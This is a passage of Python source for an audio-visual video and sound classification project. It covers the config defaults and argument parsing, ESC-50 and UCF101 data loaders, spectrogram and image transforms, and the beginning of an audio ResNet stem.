_C.MODEL.ZERO_INIT_FINAL_BN = True
# Epsilon value for normalization layers.
_C.MODEL.EPSILON = 1e-5
# Momentum value for normalization layers.
_C.MODEL.MOMENTUM = 0.1
# The number of classes to predict for the model.
_C.MODEL.NUM_CLASSES = 101
# Dropout rate.
_C.MODEL.DROPOUT_RATE = 0.5
# -----------------------------------------------------------------------------
# Data options
# -----------------------------------------------------------------------------
_C.DATA = CfgNode()
# The spatial crop size of the input clip.
_C.DATA.CROP_SIZE = 224
# The number of frames of the input clip.
_C.DATA.NUM_FRAMES = 32
# The video sampling rate of the input clip.
_C.DATA.SAMPLING_RATE = 2
# Input videos may have different fps, convert it to the target video fps before
# frame sampling.
_C.DATA.TARGET_FPS = 30
# List of input frame channel dimensions.
_C.DATA.INPUT_CHANNEL_NUM = [3]
# The mean value of the video raw pixels across the R G B channels.
_C.DATA.MEAN = [0.45, 0.45, 0.45]
# The std value of the video raw pixels across the R G B channels.
_C.DATA.STD = [0.225, 0.225, 0.225]
# The spatial crop size for pretraining.
_C.DATA.PRETRAIN_CROP_SIZE = 224
# The spatial augmentation jitter scales for pretraining.
_C.DATA.PRETRAIN_JITTER_SCALES = [256, 320]
# The spatial crop size for training.
_C.DATA.TRAIN_CROP_SIZE = 224
# The spatial augmentation jitter scales for training.
_C.DATA.TRAIN_JITTER_SCALES = [256, 320]
# The spatial crop size for testing.
_C.DATA.TEST_CROP_SIZE = 256
# Input audio clip duration (sec)
_C.DATA.CLIP_DURATION = 2
# Input audios may have different sampling rate, convert it to the target audio
# sampling rate.
_C.DATA.TARGET_AUDIO_RATE = 44100
# Number of mel bins for log-mel-scaled spectrograms.
_C.DATA.AUDIO_FREQUENCY = 80
# Time dimension for log-mel-scaled spectrograms.
_C.DATA.AUDIO_TIME = 128
# The audio frequency masking droput rate.
_C.DATA.FREQUENCY_MASK_RATE = 0.05
# The audio temporal masking dropout rate.
_C.DATA.TIME_MASK_RATE = 0.05
# Method to perform the ensemble, options include "sum" and "max".
_C.DATA.ENSEMBLE_METHOD = "sum"
# List of data augmentations.
_C.DATA.TRANSFORMATIONS = ["resize_crop", "flip", "color_normalize"]
# ---------------------------------------------------------------------------- #
# Optimizer options
# ---------------------------------------------------------------------------- #
_C.SOLVER = CfgNode()
# Base learning rate.
_C.SOLVER.BASE_LR = 1e-3
# Learning rate policy (see utils/lr_policy.py for options and examples).
_C.SOLVER.LR_POLICY = "linear"
# Maximal number of epochs.
_C.SOLVER.MAX_EPOCH = 10
# Maximal number of steps.
_C.SOLVER.NUM_STEPS = -1
# Momentum.
_C.SOLVER.MOMENTUM = 0.9
# Momentum dampening.
_C.SOLVER.DAMPENING = 0.0
# Nesterov momentum.
_C.SOLVER.NESTEROV = True
# Use AMSGrad
_C.SOLVER.USE_AMSGRAD = True
# L2 regularization.
_C.SOLVER.WEIGHT_DECAY = 1e-5
# The start learning rate of the warm up.
_C.SOLVER.WARMUP_START_LR = 0.0
# Gradually warm up the lr over this number of steps.
_C.SOLVER.WARMUP_STEPS = -1
# Gradually warm up the lr over this number of epochs.
_C.SOLVER.WARMUP_EPOCHS = -1
# Gradually warm up the lr over the first proportion of total steps.
_C.SOLVER.WARMUP_PROPORTION = 0.0
# Optimization method.
_C.SOLVER.OPTIMIZING_METHOD = "adamw"
# ---------------------------------------------------------------------------- #
# Misc options
# ---------------------------------------------------------------------------- #
# Number of GPUs to use per machine (applies to both training and testing).
_C.NUM_GPUS = -1
# Number of machine to use for the job.
_C.NUM_SHARDS = 1
# The index of the current machine.
_C.SHARD_ID = 0
# Data basedir.
_C.DATASET_ROOT = ""
# Data dir.
_C.DATASET_DIR = ""
# Output basedir.
_C.OUTPUT_ROOT = ""
# Checkpoints dir.
_C.SAVE_DIR = ""
# Log dir.
_C.LOG_DIR = ""
# Note that non-determinism may still be present due to non-deterministic
# operator implementations in GPU operator libraries.
_C.RNG_SEED = -1
# Log period in iters.
_C.LOG_PERIOD = 50
# Distributed init method.
_C.DIST_INIT_METHOD = "tcp://localhost:9999"
# Distributed backend.
_C.DIST_BACKEND = "nccl"
# ---------------------------------------------------------------------------- #
# Common train/test data loader options
# ---------------------------------------------------------------------------- #
_C.DATA_LOADER = CfgNode()
# Number of data loader workers per training process.
_C.DATA_LOADER.NUM_WORKERS = 16
# Load data to pinned host memory.
_C.DATA_LOADER.PIN_MEMORY = True
def _assert_and_infer_cfg(cfg):
# TEST assertions.
assert cfg.TEST.NUM_SPATIAL_CROPS == 3
# RESNET assertions.
assert cfg.RESNET.NUM_GROUPS > 0
assert cfg.RESNET.WIDTH_PER_GROUP > 0
assert cfg.RESNET.WIDTH_PER_GROUP % cfg.RESNET.NUM_GROUPS == 0
assert cfg.AUDIO_RESNET.NUM_GROUPS > 0
assert cfg.AUDIO_RESNET.WIDTH_PER_GROUP > 0
assert cfg.AUDIO_RESNET.WIDTH_PER_GROUP % cfg.AUDIO_RESNET.NUM_GROUPS == 0
# TASK
assert cfg.MODEL.TASK in ["Contrast", "VisualClassify", "AudioClassify", "MultimodalClassify"]
if cfg.MODEL.TASK in ["Contrast"]:
assert cfg.DATASET_DIR != ""
if cfg.MODEL.TASK in ["VisualClassify", "AudioClassify", "MultimodalClassify"]:
assert len(
{
cfg.TRAIN.DATASET,
cfg.VAL.DATASET,
cfg.TEST.DATASET,
}
) == 1
return cfg
def get_cfg():
"""
Get a copy of the default config.
"""
config = _C.clone()
parser = argparse.ArgumentParser()
parser.add_argument("--test", action="store_true")
parser.add_argument("--dist_init_method", type=str, default=None)
parser.add_argument("--dataset_root", type=str, default=None)
parser.add_argument("--output_root", type=str, default=None)
parser.add_argument("--configuration", type=str, default=None)
parser.add_argument("--cfg_file", type=str, default=None)
parser.add_argument("--pretrain_checkpoint_path", type=str, default=None)
parser.add_argument("--train_checkpoint_path", type=str, default=None)
parser.add_argument("--test_checkpoint_path", type=str, default=None)
parser.add_argument(
"opts",
default=None,
nargs=argparse.REMAINDER
)
args = parser.parse_args()
if args.cfg_file is not None:
config.merge_from_file(args.cfg_file)
if args.opts is not None:
config.merge_from_list(args.opts)
if args.dist_init_method is not None:
config.DIST_INIT_METHOD = args.dist_init_method
if args.dataset_root is not None:
config.DATASET_ROOT = args.dataset_root
elif not config.DATASET_ROOT:
config.DATASET_ROOT = dataset_root
if config.MODEL.TASK in ["VisualClassify", "AudioClassify", "MultimodalClassify"]:
if config.TRAIN.DATASET == "UCF101":
config.DATASET_DIR = os.path.join(
config.DATASET_ROOT,
'ucf101',
)
elif config.TRAIN.DATASET == "ESC50":
config.DATASET_DIR = os.path.join(
config.DATASET_ROOT,
'esc50',
)
elif config.TRAIN.DATASET == "KineticsSounds":
config.DATASET_DIR = os.path.join(
config.DATASET_ROOT,
'kinetics-sounds',
)
if args.output_root is not None:
config.OUTPUT_ROOT = args.output_root
elif not config.OUTPUT_ROOT:
config.OUTPUT_ROOT = output_root
if args.configuration is not None:
configuration = args.configuration
else:
configuration = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
config.SAVE_DIR = os.path.join(
config.OUTPUT_ROOT,
configuration,
"checkpoints"
)
if not args.test:
Path(config.SAVE_DIR).mkdir(parents=True, exist_ok=True)
config.LOG_DIR = os.path.join(
config.OUTPUT_ROOT,
configuration,
"logs"
)
if not args.test:
Path(config.LOG_DIR).mkdir(parents=True, exist_ok=True)
if config.NUM_GPUS == -1:
config.NUM_GPUS = torch.cuda.device_count()
if args.pretrain_checkpoint_path is not None:
config.PRETRAIN.CHECKPOINT_FILE_PATH = args.pretrain_checkpoint_path
if args.train_checkpoint_path is not None:
config.TRAIN.CHECKPOINT_FILE_PATH = args.train_checkpoint_path
if args.test_checkpoint_path is not None:
config.TEST.CHECKPOINT_FILE_PATH = args.test_checkpoint_path
return _assert_and_infer_cfg(config)
```
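Values defined in `_C` above can be overridden from a YAML file (`--cfg_file`) or from the trailing `opts`, both delegated to fvcore/yacs `CfgNode.merge_from_*`. A hedged sketch of the override mechanics on a fresh config object (not the project's parsed one):
```python
# Sketch of CfgNode overrides; the keys mirror the defaults above.
from fvcore.common.config import CfgNode

cfg = CfgNode()
cfg.TRAIN = CfgNode()
cfg.TRAIN.BATCH_SIZE = 64
cfg.SOLVER = CfgNode()
cfg.SOLVER.BASE_LR = 1e-3

# Equivalent to passing `TRAIN.BATCH_SIZE 32 SOLVER.BASE_LR 0.01` as opts.
cfg.merge_from_list(['TRAIN.BATCH_SIZE', '32', 'SOLVER.BASE_LR', '0.01'])
print(cfg.TRAIN.BATCH_SIZE, cfg.SOLVER.BASE_LR)  # 32 0.01
```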
#### File: code/data/esc50.py
```python
import os
import torch
import torchaudio
from pathlib import Path
import utils.logging as logging
import data.transform as transform
import data.utils as utils
from data.build import DATASET_REGISTRY
logger = logging.get_logger(__name__)
@DATASET_REGISTRY.register()
class ESC50(torch.utils.data.Dataset):
"""
ESC-50 audio loader. Construct the ESC-50 audio loader, then sample
clips from the audios. For training and validation, multiple clips are
uniformly sampled from every audio with random masking. For testing,
multiple clips are uniformaly sampled from every audio without any masking.
We convert the input audio to a monophonic signal and convert it to
log-mel-scaled spectrogram.
"""
def __init__(self, cfg, mode):
"""
Construct the ESC-50 audio loader.
Args:
cfg (CfgNode): configs.
mode (string): Options includes `train`, `val`, or `test` mode.
"""
assert mode in [
"train",
"val",
"test",
], "Mode '{}' not supported for ESC50".format(mode)
if mode == "val":
logger.info(
"ESC50 does not have the val split... "
"Instead we will use the test split"
)
self.mode = mode
self.cfg = cfg
if self.mode in ['train', 'val']:
self._num_clips = cfg.TRAIN.NUM_SAMPLES
elif self.mode in ['test']:
self._num_clips = (
cfg.TEST.NUM_SAMPLES
)
self.split = cfg[mode.upper()]["DATASET_SPLIT"]
logger.info(f"Constructin ESC50 mode {self.mode} split {self.split}")
self._construct_loader()
def _construct_loader(self):
"""
Construct the audio loader.
"""
dir_to_files = Path(
os.path.join(
self.cfg.DATASET_DIR,
"audio",
)
)
split_files = sorted(
dir_to_files.glob("*.wav")
)
if self.mode in ["train"]:
split_files = [
path for path in split_files
if int(path.name.split('.')[0].split('-')[0]) != self.split
]
elif self.mode in ["val", "test"]:
split_files = [
path for path in split_files
if int(path.name.split('.')[0].split('-')[0]) == self.split
]
self._path_to_audios = []
self._labels = []
self._temporal_idx = []
for clip_idx, path in enumerate(split_files):
label = int(path.name.split('.')[0].split('-')[-1])
for idx in range(self._num_clips):
self._path_to_audios.append(str(path))
self._labels.append(label)
self._temporal_idx.append(idx)
assert (
len(self._path_to_audios) > 0
), "Failed to load ESC50 mode {} split {}".format(
self.mode, self.split,
)
logger.info(
"Constructing ESC50 dataloader (mode: {}, split: {}, size: {})".format(
self.mode, self.split, len(self._path_to_audios),
)
)
def __len__(self):
"""
Returns:
(int): the number of audios in the dataset.
"""
return len(self._path_to_audios)
def __getitem__(self, index):
"""
Given the audio index, return the log-mel-scaled spectrogram, label,
and audio index.
args:
index (int): the audio index provided by the pytorch sampler.
returns:
audio_clip (tensor): log-mel-spectrogram sampled from the audio.
The dimension is `channel` x `frequency` x `time`.
label (int): the label of the current audio.
index (int): the index of the audio.
"""
waveform, audio_fps = torchaudio.load(self._path_to_audios[index])
# Convert it to a monophonic signal, and resample to the
# target sampling rate if needed.
waveform = transform.resample(
waveform,
audio_fps,
self.cfg.DATA.TARGET_AUDIO_RATE,
use_mono=True,
)
total_length = waveform.size(1)
# We sample a `DATA.CLIP_DURATION`-sec clip.
clip_length = (
self.cfg.DATA.TARGET_AUDIO_RATE * self.cfg.DATA.CLIP_DURATION
)
delta = max(total_length - clip_length, 0)
start_idx = int(
delta * self._temporal_idx[index] / (self._num_clips - 1)
)
audio_clip = self.get_audio(
waveform,
start_idx,
clip_length,
True if self.mode in ['train'] else False,
)
label = self._labels[index]
return audio_clip, label, index
def get_audio(
self,
waveform,
start_idx,
clip_length,
apply_transform=False,
):
"""
Sample a clip from the input audio, and apply audio transformations.
Args:
waveform (tensor): a tensor of audio waveform, dimension is
`channel` x `time`.
start_idx (int): the start index.
clip_length (int): the size of audio clip.
apply_transform (bool): whether to apply transformations.
Returns:
(tensor): log-mel-scaled spectrogram with dimension of
`channel` x `frequency` x `time`.
"""
# Temporal sampling.
waveform_view = waveform[:, start_idx:start_idx + clip_length]
# Convert it to log-mel-scaled spectrogram.
log_mel_spectrogram = transform.get_log_mel_spectrogram(
waveform_view,
self.cfg.DATA.TARGET_AUDIO_RATE,
self.cfg.DATA.AUDIO_FREQUENCY,
self.cfg.DATA.AUDIO_TIME,
)
# Apply transformations.
if apply_transform:
log_mel_spectrogram = utils.apply_audio_transform(
log_mel_spectrogram,
self.cfg.DATA.FREQUENCY_MASK_RATE,
self.cfg.DATA.TIME_MASK_RATE,
)
return log_mel_spectrogram
```
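The `__getitem__` above spaces the `_num_clips` clip start indices evenly between the beginning of the file and the last position where a full clip still fits. A small numeric sketch with made-up durations (5 s audio, 2 s clips, 10 clips):
```python
# Numeric sketch of the start-index spacing used in ESC50.__getitem__.
target_rate, clip_duration, num_clips = 44100, 2, 10
total_length = 5 * target_rate
clip_length = target_rate * clip_duration
delta = max(total_length - clip_length, 0)

starts = [int(delta * i / (num_clips - 1)) for i in range(num_clips)]
print(starts[0], starts[-1], total_length - clip_length)
# 0 132300 132300  -> clips are spread evenly from the start to the latest valid offset
```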
#### File: code/data/transform.py
```python
import math
import numpy as np
import torch
import torchaudio
def random_short_side_scale_jitter(
images, min_size, max_size,
):
"""
Perform a spatial short scale jittering on the given images.
Args:
images (tensor): images to perform scale jitter. Dimension is
`num frames` x `channel` x `height` x `width`.
min_size (int): the minimal size to scale the frames.
max_size (int): the maximal size to scale the frames.
Returns:
(tensor): the scaled images with dimension of
`num frames` x `channel` x `new height` x `new width`.
"""
size = int(round(np.random.uniform(min_size, max_size)))
height = images.shape[2]
width = images.shape[3]
if (width <= height and width == size) or (
height <= width and height == size
):
return images
new_width = size
new_height = size
if width < height:
new_height = int(math.floor((float(height) / width) * size))
else:
new_width = int(math.floor((float(width) / height) * size))
return torch.nn.functional.interpolate(
images,
size=(new_height, new_width),
mode="nearest",
# align_corners=False,
)
def random_crop(images, size):
"""
Perform random spatial crop on the given images.
Args:
images (tensor): images to perform random crop. The dimension is
`num frames` x `channel` x `height` x `width`.
size (int): the size of height and width to crop on the image.
Returns:
cropped (tensor): cropped images with dimension of
`num frames` x `channel` x `size` x `size`.
"""
if images.shape[2] == size and images.shape[3] == size:
return images
height = images.shape[2]
width = images.shape[3]
y_offset = 0
if height > size:
y_offset = int(np.random.randint(0, height - size))
x_offset = 0
if width > size:
x_offset = int(np.random.randint(0, width - size))
cropped = images[
:, :, y_offset : y_offset + size, x_offset : x_offset + size
]
return cropped
def horizontal_flip(prob, images):
"""
Perform horizontal flip on the given images.
Args:
        prob (float): probability to flip the images.
images (tensor): images to perform horizontal flip, the dimension is
`num frames` x `channel` x `height` x `width`.
Returns:
images (tensor): images with dimension of
`num frames` x `channel` x `height` x `width`.
"""
if np.random.uniform() < prob:
images = images.flip((-1))
return images
def uniform_crop(images, size, spatial_idx):
"""
Perform uniform spatial sampling on the images.
args:
images (tensor): images to perform uniform crop. The dimension is
`num frames` x `channel` x `height` x `width`.
        size (int): size of height and width to crop the images.
        spatial_idx (int): 0, 1, or 2 for left, center, and right crop if width
            is larger than height, or 0, 1, or 2 for top, center, and bottom
            crop if height is larger than width.
returns:
cropped (tensor): images with dimension of
`num frames` x `channel` x `size` x `size`.
"""
assert spatial_idx in [0, 1, 2]
height = images.shape[2]
width = images.shape[3]
y_offset = int(math.ceil((height - size) / 2))
x_offset = int(math.ceil((width - size) / 2))
if height > width:
if spatial_idx == 0:
y_offset = 0
elif spatial_idx == 2:
y_offset = height - size
else:
if spatial_idx == 0:
x_offset = 0
elif spatial_idx == 2:
x_offset = width - size
cropped = images[
:, :, y_offset : y_offset + size, x_offset : x_offset + size
]
return cropped
def color_normalization(images, mean, stddev):
"""
    Perform color normalization on the given images.
Args:
images (tensor): images to perform color normalization. Dimension is
`num frames` x `channel` x `height` x `width`.
mean (list): mean values for normalization.
stddev (list): standard deviations for normalization.
Returns:
        out_images (tensor): the normalized images, the dimension is
`num frames` x `channel` x `height` x `width`.
"""
assert len(mean) == images.shape[1], "channel mean not computed properly"
assert (
len(stddev) == images.shape[1]
), "channel stddev not computed properly"
out_images = torch.zeros_like(images)
for idx in range(len(mean)):
out_images[:, idx] = (images[:, idx] - mean[idx]) / stddev[idx]
return out_images
def mask_along_axis_consistent(
specgrams,
mask_param,
mask_value,
axis,
):
"""
Apply a consistent mask along ``axis`` on a batch of specgrams.
Mask will be applied from indices ``[v_0, v_0 + v)``, where
``v`` is sampled from ``uniform(0, mask_param)``, and ``v_0`` from ``uniform(0, max_v - v)``.
Args:
specgrams (Tensor): Real spectrograms (batch, channel, freq, time)
mask_param (int): Number of columns to be masked will be uniformly sampled from [0, mask_param]
mask_value (float): Value to assign to the masked columns
axis (int): Axis to apply masking on (2 -> frequency, 3 -> time)
Returns:
Tensor: Masked spectrograms of dimensions (batch, channel, freq, time)
"""
if axis != 2 and axis != 3:
raise ValueError('Only Frequency and Time masking are supported')
device = specgrams.device
dtype = specgrams.dtype
value = torch.rand(specgrams.shape[1], device=device, dtype=dtype) * mask_param
min_value = torch.rand(specgrams.shape[1], device=device, dtype=dtype) * (specgrams.size(axis) - value)
value, min_value = value.unsqueeze(0), min_value.unsqueeze(0)
# Create broadcastable mask
mask_start = min_value[..., None, None]
mask_end = (min_value + value)[..., None, None]
mask = torch.arange(0, specgrams.size(axis), device=device, dtype=dtype)
# Per batch example masking
specgrams = specgrams.transpose(axis, -1)
specgrams.masked_fill_((mask >= mask_start) & (mask < mask_end), mask_value)
specgrams = specgrams.transpose(axis, -1)
return specgrams
def resample(waveform, orig_freq, new_freq, use_mono=True):
"""
Resample the input waveform to ``new_freq``.
args:
        waveform (tensor): waveform to perform resampling. The dimension is
            `channel` x `time`.
`orig_freq` (int): original sampling rate of `waveform`.
`new_freq` (int): target sampling rate of `waveform`.
`use_mono` (bool): If True, first convert `waveform` to a monophonic signal.
returns:
(tensor): waveform with dimension of
`channel` x `time`.
"""
if waveform.size(0) != 1 and use_mono:
waveform = waveform.mean(0, keepdim=True)
if orig_freq != new_freq:
waveform = torchaudio.transforms.Resample(
orig_freq, new_freq,
)(waveform)
return waveform
def get_log_mel_spectrogram(
waveform,
audio_fps,
frequency,
time,
):
"""
Convert the input waveform to log-mel-scaled spectrogram.
args:
waveform (tensor): input waveform. The dimension is
`channel` x `time.`
`audio_fps` (int): sampling rate of `waveform`.
        `frequency` (int): target frequency dimension (number of mel bins).
`time` (int): target time dimension.
returns:
(tensor): log-mel-scaled spectrogram with dimension of
`channel` x `frequency` x `time`.
"""
w = waveform.size(-1)
n_fft = 2 * (math.floor(w / time) + 1)
mel_spectrogram = torchaudio.transforms.MelSpectrogram(
audio_fps, n_fft=n_fft, n_mels=frequency,
)(waveform)
log_mel_spectrogram = torch.log(1e-6 + mel_spectrogram)
_nchannels, _frequency, _time = log_mel_spectrogram.size()
assert _frequency == frequency, \
f"frequency {_frequency} must be {frequency}"
if _time != time:
t = torch.zeros(
_nchannels,
frequency,
time,
dtype=log_mel_spectrogram.dtype,
)
min_time = min(time, _time)
t[:, :, :min_time] = log_mel_spectrogram[:, :, :min_time]
log_mel_spectrogram = t
return log_mel_spectrogram
```
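In `get_log_mel_spectrogram` above, `n_fft` is chosen so that, with torchaudio's default `hop_length = n_fft // 2`, the spectrogram's time dimension lands close to the requested `time`; any residual mismatch is handled by the zero-pad/truncate branch. A quick arithmetic sketch with example values:
```python
# Arithmetic behind the n_fft choice in get_log_mel_spectrogram (example values).
import math

w = 44100 * 2          # 2 s of 44.1 kHz audio
time = 128
n_fft = 2 * (math.floor(w / time) + 1)
hop = n_fft // 2
frames = w // hop + 1  # STFT frames with center padding
print(n_fft, hop, frames)  # 1380 690 128
```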
#### File: code/data/ucf101.py
```python
import random
import torch
import torchvision
from pathlib import Path
import utils.logging as logging
import data.utils as utils
from data.build import DATASET_REGISTRY
logger = logging.get_logger(__name__)
@DATASET_REGISTRY.register()
class UCF101(torch.utils.data.Dataset):
"""
UCF101 video loader. Construct the UCF101 video loader, then sample
clips from the videos. For training and validation, multiple clips are
uniformly sampled from every video with random cropping, scaling, and
flipping. For testing, multiple clips are uniformaly sampled from every
video with uniform cropping. For uniform cropping, we take the left, center,
and right crop if the width is larger than height, or take top, center, and
bottom crop if the height is larger than the width.
"""
def __init__(self, cfg, mode):
"""
Construct the UCF101 video loader with given text files containing
video paths and a list of classes.
Args:
cfg (CfgNode): configs.
mode (string): Options includes `train`, `val`, or `test` mode.
"""
assert mode in [
"train",
"val",
"test",
], "Mode '{}' not supported for UCF101".format(mode)
if mode == "val":
logger.info(
"UCF101 does not have the val split... "
"Instead we will use the test split"
)
self.mode = mode
self.cfg = cfg
if self.mode in ['train', 'val']:
self._num_clips = cfg.TRAIN.NUM_SAMPLES
elif self.mode in ['test']:
self._num_clips = (
cfg.TEST.NUM_SAMPLES
)
assert cfg.TEST.NUM_SAMPLES == cfg.TEST.NUM_ENSEMBLE_VIEWS * cfg.TEST.NUM_SPATIAL_CROPS, \
f"test num samples {cfg.TEST.NUM_SAMPLES} must be #views {cfg.TEST.NUM_ENSEMBLE_VIEWS} x #crops {cfg.TEST.NUM_SPATIAL_CROPS}"
self.split = cfg[mode.upper()]["DATASET_SPLIT"]
logger.info(f"Constructin UCF101 mode {self.mode} split {self.split}")
self._construct_loader()
def _construct_loader(self):
"""
Construct the video loader.
"""
mode = 'test' if self.mode == 'val' else self.mode
dir_to_files = Path(self.cfg.DATASET_DIR)
class_file = dir_to_files.joinpath(
"splits",
"classInd.txt"
)
path_to_file = dir_to_files.joinpath(
"splits",
f"{mode}list{self.split:02d}.txt"
)
assert class_file.exists(), "{} not found".format(str(class_file))
assert path_to_file.exists(), "{} not found".format(str(path_to_file))
with open(class_file, "r") as f:
classInd = f.readlines()
self.class2idx = {
l.strip().split()[1]: int(l.strip().split()[0]) - 1 for l in classInd
}
self.idx2class = [l.strip().split()[1] for l in classInd]
self._path_to_videos = []
self._labels = []
self._spatial_temporal_idx = []
with open(path_to_file, "r") as f:
dataset = f.readlines()
dataset = [l.strip() for l in dataset]
for clip_idx, l in enumerate(dataset):
if mode in ['train']:
path = str(dir_to_files.joinpath(l.split()[0]))
label = self.class2idx[l.split()[0].split('/')[0]]
elif mode in ['test']:
path = str(dir_to_files.joinpath(l))
label = self.class2idx[l.split('/')[0]]
for idx in range(self._num_clips):
self._path_to_videos.append(path)
self._labels.append(label)
self._spatial_temporal_idx.append(idx)
assert (
len(self._path_to_videos) > 0
), "Failed to load UCF101 mode {} split {}".format(
self.mode, self.split,
)
logger.info(
"Constructing UCF101 dataloader (mode: {}, split: {}, size: {})".format(
self.mode, self.split, len(self._path_to_videos),
)
)
def __len__(self):
"""
Returns:
(int): the number of videos in the dataset.
"""
return len(self._path_to_videos)
def __getitem__(self, index):
"""
Given the video index, return the list of frames, label, and
video index.
Args:
index (int): the video index provided by the pytorch sampler.
Returns:
            visual_clip (tensor): the frames sampled from the video.
The dimension is `channel` x `num frames` x `height` x `width`.
label (int): the label of the current video.
index (int): the index of the video.
"""
frames, waveform, info = torchvision.io.read_video(
self._path_to_videos[index],
pts_unit="sec",
)
video_fps = round(info["video_fps"])
if self.mode in ['train', 'val']:
temporal_sample_index = self._spatial_temporal_idx[index]
# -1 indicates random sampling.
spatial_sample_index = -1
min_scale = self.cfg.DATA.TRAIN_JITTER_SCALES[0]
max_scale = self.cfg.DATA.TRAIN_JITTER_SCALES[1]
crop_size = self.cfg.DATA.TRAIN_CROP_SIZE
num_samples = self._num_clips
elif self.mode in ['test']:
temporal_sample_index = (
self._spatial_temporal_idx[index]
// self.cfg.TEST.NUM_SPATIAL_CROPS
)
# spatial_sample_index is in [0, 1, 2]. Corresponding to left,
# center, or right if width is larger than height, and top, middle,
# or bottom if height is larger than width.
spatial_sample_index = (
self._spatial_temporal_idx[index]
% self.cfg.TEST.NUM_SPATIAL_CROPS
)
# The testing is deterministic and no jitter should be performed.
            # min_scale, max_scale, and crop_size are expected to be the same.
min_scale, max_scale, crop_size = [self.cfg.DATA.TEST_CROP_SIZE] * 3
assert len({min_scale, max_scale, crop_size}) == 1
num_samples = self.cfg.TEST.NUM_ENSEMBLE_VIEWS
else:
raise NotImplementedError(
"Does not support {} mode".format(self.mode)
)
        # Adjust the number of frames considering the input video fps, target fps and
# frame sampling rate.
_num_frames = (
self.cfg.DATA.NUM_FRAMES *
self.cfg.DATA.SAMPLING_RATE *
video_fps /
self.cfg.DATA.TARGET_FPS
)
delta = max(frames.size(0) - _num_frames, 0)
# If num_samples == 1, a single clip is randomly sampled from the input
# video. Otherwise, multiple clips are uniformly sampled.
if num_samples > 1:
start_idx = (
delta * temporal_sample_index / (num_samples - 1)
)
else:
start_idx = random.uniform(0, delta)
end_idx = start_idx + _num_frames - 1
visual_clip = self.get_visual_clip(
frames,
start_idx,
end_idx,
min_scale,
max_scale,
crop_size,
spatial_sample_index,
)
label = self._labels[index]
return visual_clip, label, index
def get_visual_clip(
self,
frames,
start_idx,
end_idx,
min_scale,
max_scale,
crop_size,
spatial_sample_index,
):
"""
Sample a clip from the input video, and apply visual transformations.
Args:
frames (tensor): a tensor of video frames, dimension is
`num frames` x `height` x `width` x `channel`.
start_idx (float): the index of the start frame.
end_idx (float): the index of the end frame.
min_scale (int): the minimal size of scaling.
max_scale (int): the maximal size of scaling.
crop_size (int): the size of height and width used to crop the
frames.
spatial_sample_index (int): if -1, perform random spatial sampling.
If 0, 1, or 2, perform left, center, right crop if width is
                larger than height, and perform top, center, bottom crop if
height is larger than width.
Returns:
clip (tensor): sampled frames. The dimension is
`channel` x `num frames` x `height` x `width`.
"""
# Temporal sampling.
clip = utils.temporal_sampling(
frames,
start_idx,
end_idx,
self.cfg.DATA.NUM_FRAMES,
)
# Convert frames of the uint type in the range [0, 255] to
# a torch.FloatTensor in the range [0.0, 1.0]
clip = clip.float()
clip = clip / 255.0
# T H W C -> T C H W
clip = clip.permute(0, 3, 1, 2)
# Visual transformations.
clip = utils.apply_visual_transform(
self.cfg,
clip,
spatial_idx=spatial_sample_index,
min_scale=min_scale,
max_scale=max_scale,
crop_size=crop_size,
)
# T C H W -> C T H W
clip = clip.transpose(0, 1).contiguous()
clip = [clip]
return clip
```
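For reference, the uniform test-time clip placement above spreads the start indices evenly over the frames left after accounting for the clip length; a small numeric sketch with hypothetical numbers:

```python
# Hypothetical numbers: a 300-frame video, 64-frame clips, 3 uniformly spaced test clips.
_num_frames = 64
delta = max(300 - _num_frames, 0)   # 236 spare frames
num_samples = 3
starts = [delta * i / (num_samples - 1) for i in range(num_samples)]
print(starts)                       # [0.0, 118.0, 236.0]
```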
#### File: evaluation/code/loader_validation.py
```python
from data import loader
import utils.distributed as du
def loader_validate(cfg):
# Create the audio-visual pretrain loader.
pretrain_loader = loader.construct_loader(cfg, 'pretrain')
num_batches_per_epoch = len(pretrain_loader)
print(f"NUM_BATCHES: {num_batches_per_epoch}")
rank = du.get_rank()
for i, (visual_clip, audio_clip) in enumerate(pretrain_loader):
batch_size = visual_clip[0].size(0)
print(f"[RANK {rank}] step_{i}: batch_size={batch_size}")
```
#### File: code/models/audio_stem_helper.py
```python
import torch.nn as nn
class AudioModelStem(nn.Module):
"""
Audio 2D stem module. Provides stem operations of Conv, BN, ReLU
on input data tensor for the single audio pathway.
"""
def __init__(
self,
dim_in,
dim_out,
kernel,
stride,
padding,
inplace_relu=True,
eps=1e-5,
bn_mmt=0.1,
separable=True,
):
"""
Args:
dim_in (int): the channel dimension of the input.
dim_out (int): the output dimension of the convolution in the stem
layer.
kernel (list): the kernel's size of the convolution in the stem
layer. Frequency kernel size, time kernel size in order.
stride (list): the stride size of the convolution in the stem
                layer. Frequency kernel stride, time kernel stride in order.
padding (list): the padding's size of the convolution in the stem
layer. Frequency padding size, time padding size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for normalization.
bn_mmt (float): momentum for batch norm.
separable (bool): if True, divide kxk kernel into kx1, 1xk
"""
super(AudioModelStem, self).__init__()
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
# Construct the stem layer.
self._construct_stem(dim_in, dim_out, separable)
def _construct_stem(self, dim_in, dim_out, separable):
stem = ResNetBasicStem(
dim_in,
dim_out,
self.kernel,
self.stride,
self.padding,
self.inplace_relu,
self.eps,
self.bn_mmt,
separable,
)
self.add_module("stem", stem)
def forward(self, x):
x = self.stem(x)
return x
class ResNetBasicStem(nn.Module):
"""
ResNe(X)t 2D stem module.
Performs Convolution, BN, and Relu.
"""
def __init__(
self,
dim_in,
dim_out,
kernel,
stride,
padding,
inplace_relu=True,
eps=1e-5,
bn_mmt=0.1,
separable=True,
):
"""
Args:
dim_in (int): the channel dimension of the input.
dim_out (int): the output dimension of the convolution in the stem
layer.
kernel (list): the kernel size of the convolution in the stem layer.
Frequency kernel size, time kernel size in order.
stride (list): the stride size of the convolution in the stem layer.
                Frequency kernel stride, time kernel stride in order.
padding (list): the padding size of the convolution in the stem
layer. Frequency padding size, time padding size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for normalization.
bn_mmt (float): momentum for batch norm.
separable (bool): if True, divide kxk kernel into kx1, 1xk
"""
super(ResNetBasicStem, self).__init__()
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self.separable = separable
# Construct the stem layer.
self._construct_stem(dim_in, dim_out)
def _construct_stem(self, dim_in, dim_out):
if self.separable:
